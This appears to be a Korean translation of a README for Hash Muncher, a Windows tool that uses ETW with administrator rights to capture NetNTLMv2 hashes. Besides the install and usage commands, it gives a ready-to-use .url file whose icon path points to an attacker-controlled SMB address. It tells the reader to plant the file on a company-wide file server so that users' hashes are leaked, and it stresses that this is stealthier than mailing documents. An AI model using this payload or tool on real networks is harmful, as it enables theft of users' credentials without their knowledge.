
Windows 8.1 / Windows Server 2016 이상에서 관리자 권한으로 ETW를 사용하여 NetNTLMv2 해시를 캡처합니다.
Windows에서 관리자 권한으로 ETW를 사용해 NetNTLMv2 해시를 수집하세요
이 도구를 설치하고 실행하는 세 가지 방법이 있습니다
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Hash Muncher는 내장 SMB 서비스가 초기 요청을 보내고 수신하며 대상에 응답 패킷을 보내야 하므로 Windows 방화벽이 "파일 및 프린터 공유"를 허용하는지 확인하세요.
상승된 프롬프트에서 Hash Muncher를 실행하세요
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
IP 주소를 Hash Muncher 기계의 주소로 바꾸고, 파일을 (회사 전체) 파일서버에 'whatever.url'로 저장한 다음 해시가 쏟아져 들어오는 것을 지켜보세요.
Red Team Notes - Forced Authentication에 언급된 다른 방법들도 있으며, 모든 사람에게 Word 문서를 메일로 보내도 성공할 수 있겠지만 전혀 은밀하지 않습니다.
저는 ETW를 이리저리 만져보고 있었는데, Nettitude Labs의 매우 멋진 연구를 본 순간 이걸 제가 가장 좋아하는 언어인 Golang으로 쉽게 사용할 수 있는 도구로 만들어야겠다고 생각했습니다! Nettitude Labs에는 .Net 프레임워크에서 실행되는 C#으로 작성된 작동하는 POC가 있으며, 그것이 여러분에게 더 나은 선택이 될 수도 있습니다. 그래서 저는 여기서 새로운 것을 발명한 것이 아니라, 단지 대안으로 이 도구를 추가한 것뿐입니다.
Windows 보안 관련 내용을 좋아하신다면 제 공격 그래프 도구 Adalanche도 마음에 드실 겁니다.